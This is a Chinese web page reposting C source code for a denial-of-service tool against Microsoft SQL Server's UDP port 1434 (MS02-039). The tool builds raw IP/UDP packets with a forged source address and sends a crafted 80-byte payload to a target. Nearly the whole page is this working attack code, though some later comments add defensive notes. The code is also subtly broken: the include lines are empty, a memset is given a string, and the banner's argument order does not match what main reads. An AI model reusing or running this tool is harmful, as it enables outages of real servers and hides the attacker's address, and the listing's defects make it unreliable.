
AR利用SQLSERVER的UDP溢出的DOS程序源代码

  ////////////////////////////////////////////////////////////
  //             
  // SQL Overflow dos tool
  //
  // Reference: MS02-039
  //
  // Author: refdom
  // Email: refdom@263.net
  // Homepage: www.opengram.com
  //
  ////////////////////////////////////////////////////////////
  #include
  #include
  #include
  #include
  #include
  #pragma comment(lib,"ws2_32.lib")
  #define SOURCE_PORT 53
  #define DEST_PORT 1434
  // IPv4 header as laid out on the wire; Sendudp fills one in by hand because
  // the socket is opened with IP_HDRINCL.
  typedef struct ip_hdr
  {
  unsigned char h_verlen; // 4-bit IP version (high nibble) and 4-bit header length in 32-bit words (low nibble)
  unsigned char tos; // 8-bit type of service (TOS)
  unsigned short total_len; // 16-bit total length in bytes
  unsigned short ident; // 16-bit identification
  unsigned short frag_and_flags; // 3-bit flags (the rest of the field is the fragment offset)
  unsigned char ttl; // 8-bit time to live (TTL)
  unsigned char proto; // 8-bit protocol (TCP, UDP or other)
  unsigned short checksum; // 16-bit IP header checksum
  unsigned int sourceIP; // 32-bit source IP address
  unsigned int destIP; // 32-bit destination IP address
  }IP_HEADER;
  // TCP pseudo-header. This declares an object named psd_header of an
  // anonymous struct type; nothing else in this listing refers to it.
  struct
  {
  unsigned long saddr; // source address
  unsigned long daddr; // destination address
  char mbz; // presumably the "must be zero" byte -- TODO confirm
  char ptcl; // protocol type
  unsigned short tcpl; // TCP length
  }psd_header;
  // TCP header. Not referenced by the other code in this listing, which only
  // builds UDP datagrams.
  typedef struct tcp_hdr
  {
  USHORT th_sport; // 16-bit source port
  USHORT th_dport; // 16-bit destination port
  unsigned int th_seq; // 32-bit sequence number
  unsigned int th_ack; // 32-bit acknowledgement number
  unsigned char th_lenres; // 4-bit header length / reserved bits
  unsigned char th_flag; // 6-bit flags
  USHORT th_win; // 16-bit window size
  USHORT th_sum; // 16-bit checksum
  USHORT th_urp; // 16-bit urgent pointer (offset of urgent data)
  }TCP_HEADER;
  // UDP header. Sendudp stores the ports and the length with htons(), i.e. in
  // network byte order.
  typedef struct udp_hdr
  {
  unsigned short sourceport; // source port
  unsigned short destport; // destination port
  unsigned short udp_length; // length of the UDP header plus payload, in bytes
  unsigned short udp_checksum; // checksum over pseudo-header, UDP header and payload
  } UDP_HEADER;
  // checksum: 16-bit one's-complement checksum over `size` bytes at `buffer`.
  //
  // buffer - start of the data, read as consecutive 16-bit words; the caller
  //          is responsible for passing a pointer that may be read that way.
  // size   - number of bytes to cover; an odd final byte is added on its own.
  // Returns the complement of the folded sum, truncated to 16 bits.
  USHORT checksum(USHORT *buffer, int size)
  {
    unsigned long acc = 0;

    // Sum the data one 16-bit word at a time.
    for (; size > 1; size -= sizeof(USHORT))
    {
      acc += *buffer++;
    }

    // A single byte is left over when the length is odd.
    if (size != 0)
    {
      acc += *(UCHAR *)buffer;
    }

    // Fold the carries above bit 15 back into the low 16 bits, twice, so a
    // carry produced by the first fold is absorbed too.
    acc = (acc & 0xffff) + (acc >> 16);
    acc += acc >> 16;

    return (USHORT)(~acc);
  }
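  // Usage: prints the program banner and the command-line synopsis to stdout.
  //
  // The first and last banner lines in this copy of the listing carried
  // unrelated injected text (the last one still ends in a stray '*'), so both
  // are written here as a plain row of asterisks. The width of the row is
  // arbitrary. Every other line is printed exactly as in the listing.
  void Usage()
  {
    static const char rule[] = "**************************************************\n";

    printf("%s", rule);
    printf("SQLOverFlowDOS(MS02-039)\n");
    printf("\t Written by Refdom\n");
    printf("\t Email: refdom@263.net\n");
    printf("\t Homepage: www.opengram.com\n");
    printf("Useage: SQLDOS.exe Fake_ip Target_ip \n");
    printf("%s", rule);
  }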
  // Sendudp: assembles one IPv4/UDP datagram by hand and transmits the same
  // bytes five times, 500 ms apart, to UDP port DEST_PORT on ulTargetIP.
  //
  // ulTargetIP - destination address; copied unchanged into the IP header and
  //              into the sendto() address (no byte-order conversion here).
  // ulFakeIP   - value copied unchanged into the IP source-address field. The
  //              socket is opened with IP_HDRINCL, so the source address on the
  //              wire is this caller-supplied value.
  // Returns nothing; every failure is reported only through printf.
  //
  // Defender notes:
  //  - What reaches the network is a UDP datagram to port 1434 with source
  //    port 53 and an 80-byte payload whose first byte is 0x04. Detection is
  //    better keyed on destination port, payload length and the leading byte
  //    than on the filler that follows.
  //  - The source address is forged, so the address seen in server or firewall
  //    logs does not identify the sender. Anti-spoofing (ingress/egress)
  //    filtering on the network edge is the control that limits this.
  //  - A stateless filter rule that admits any UDP packet with source port 53
  //    would pass this datagram; stateful filtering would not treat it as a
  //    DNS reply. (Presumably that is why port 53 was chosen -- not stated.)
  //  - The file header cites MS02-039: affected servers need that fix, and
  //    UDP 1434 should not be reachable from untrusted networks.
  //
  // NOTE(review): the early returns after setsockopt() and sendto() failures
  // leave `sock` open; only the success path reaches closesocket().
  void Sendudp (unsigned long ulTargetIP, unsigned long ulFakeIP)
  {
  SOCKET sock;
  SOCKADDR_IN addr_in;
  BOOL flag;
  // Request payload, 80 bytes, zero-initialised.
  char buf[80] = {0};
  IP_HEADER ipHeader;
  UDP_HEADER udpHeader;
  int iTotalSize, iUdpCheckSumSize, i, j;
  // Scratch buffer: first used to lay out the checksum input, then reused for
  // the packet that is actually sent. Both layouts fit in 256 bytes.
  char sendbuf[256] = {0};
  char *ptr = NULL;
  // Pad all but the last two bytes of buf with filler, then overwrite the
  // first byte with the request type 0x04.
  memset(buf, "A", sizeof(buf) - 2);
  buf[0] = 0x04;
  // Raw socket: the program supplies its own IP and UDP headers. Opening one
  // typically requires administrative rights on the sending host.
  sock = WSASocket(AF_INET,SOCK_RAW,IPPROTO_UDP,NULL,0,0);
  if (sock == INVALID_SOCKET)
  {
  printf("socket Error!\n");
  return;
  }
  // `true` is not a C keyword before C23; the listing relies on it being
  // defined (C++ compilation or <stdbool.h>).
  flag = true;
  // IP_HDRINCL: the data passed to sendto() begins with a caller-built IP header.
  if (setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char*)&flag,sizeof(flag))==SOCKET_ERROR)
  {
  printf("setsockopt Error!\n");
  // NOTE(review): sock is not closed on this path.
  return;
  }
  iTotalSize=sizeof(ipHeader)+sizeof(udpHeader)+sizeof(buf);
  // Version 4 in the high nibble, header length in 32-bit words in the low
  // nibble; the division assumes sizeof(unsigned long) == 4.
  ipHeader.h_verlen = (4 << 4) | (sizeof(ipHeader) / sizeof(unsigned long));
  ipHeader.tos=0;
  ipHeader.total_len=htons(iTotalSize);
  ipHeader.ident=0;
  ipHeader.frag_and_flags=0;
  ipHeader.ttl=128;
  ipHeader.proto=IPPROTO_UDP;
  // The IP header checksum is left at zero; this function never computes it.
  ipHeader.checksum=0;
  ipHeader.sourceIP = ulFakeIP;
  ipHeader.destIP = ulTargetIP;
  udpHeader.sourceport = htons(SOURCE_PORT);
  udpHeader.destport = htons(DEST_PORT);
  udpHeader.udp_length = htons(sizeof(udpHeader)+sizeof(buf));
  udpHeader.udp_checksum = 0;
  ptr = NULL;
  // Compute the UDP checksum: lay out the pseudo-header (source address,
  // destination address, zero byte, protocol, UDP length), then the UDP header
  // with a zero checksum field, then the payload, and checksum the result.
  ZeroMemory(sendbuf,sizeof(sendbuf));
  ptr=sendbuf;
  iUdpCheckSumSize=0;
  udpHeader.udp_checksum = 0;
  memcpy(ptr,&ipHeader.sourceIP,sizeof(ipHeader.sourceIP));
  ptr +=sizeof(ipHeader.sourceIP);
  iUdpCheckSumSize+=sizeof(ipHeader.sourceIP);
  memcpy(ptr,&ipHeader.destIP,sizeof(ipHeader.destIP));
  ptr +=sizeof(ipHeader.destIP);
  iUdpCheckSumSize +=sizeof(ipHeader.destIP);
  // Skip one byte: the pseudo-header's zero byte, already cleared by ZeroMemory.
  ptr++;
  iUdpCheckSumSize++;
  memcpy(ptr,&ipHeader.proto,sizeof(ipHeader.proto));
  ptr +=sizeof(ipHeader.proto);
  iUdpCheckSumSize +=sizeof(ipHeader.proto);
  memcpy(ptr,&udpHeader.udp_length,sizeof(udpHeader.udp_length));
  ptr +=sizeof(udpHeader.udp_length);
  iUdpCheckSumSize +=sizeof(udpHeader.udp_length);
  memcpy(ptr,&udpHeader,sizeof(udpHeader));
  ptr +=sizeof(udpHeader);
  iUdpCheckSumSize += sizeof(udpHeader);
  // Append the payload byte by byte.
  for(i = 0; i < sizeof(buf); i++,ptr++)
  *ptr = buf[i];
  iUdpCheckSumSize += sizeof(buf);
  udpHeader.udp_checksum = checksum((USHORT*)sendbuf,iUdpCheckSumSize);
  // Reuse sendbuf for the real packet: IP header, UDP header, payload.
  ZeroMemory(sendbuf,sizeof(sendbuf));
  memcpy(sendbuf,&ipHeader,sizeof(ipHeader));
  memcpy(sendbuf+sizeof(ipHeader),&udpHeader,sizeof(udpHeader));
  memcpy(sendbuf+sizeof(ipHeader)+sizeof(udpHeader),buf,sizeof(buf));
  addr_in.sin_family = AF_INET;
  addr_in.sin_port = htons(DEST_PORT);
  addr_in.sin_addr.S_un.S_addr = ulTargetIP ;
  printf("\n Starting send packet\n\t");
  // Send the same datagram five times, pausing 500 ms before each send.
  for (j = 0; j < 5; j++)
  {
  Sleep(500);
  if (sendto(sock, sendbuf, iTotalSize, 0, (SOCKADDR *)&addr_in, sizeof(addr_in))==SOCKET_ERROR)
  {
  printf("Send Error!\n");
  // NOTE(review): sock is not closed on this path.
  return;
  }
  else
  {
  printf(".");
  }
  }
  printf("\n Send OK!\n");
  // Always true here: the INVALID_SOCKET case returned earlier.
  if (sock != INVALID_SOCKET)
  closesocket(sock);
  }
  // main: prints the banner, converts the two command-line addresses with
  // inet_addr(), starts Winsock and hands both addresses to Sendudp().
  //
  // The banner is printed on every run, before the argument count is checked.
  // The inet_addr() results are passed on without being checked.
  // Returns 0 on completion. The two early exits return `false`, which is also
  // 0, so the exit code does not distinguish failure from success.
  int main(int argc, char* argv[])
  {
    WSADATA wsa;
    unsigned long target;
    unsigned long spoofed;

    Usage();

    // Both address arguments are required.
    if (!(argc >= 3))
    {
      return false;
    }

    target = inet_addr(argv[1]);
    spoofed = inet_addr(argv[2]);

    // Winsock 2.0 must be initialised before any socket call.
    if (0 != WSAStartup(MAKEWORD(2,0), &wsa))
    {
      printf("WSAStartup error.Error:%d\n", WSAGetLastError());
      return false;
    }

    printf("DOS starting ...\n");
    Sendudp(target, spoofed);
    printf("\nComplete!\n");

    WSACleanup();
    return 0;
  }
 


    文章作者: 福州军威计算机技术有限公司
    版权声明:原创作品,允许转载,转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。
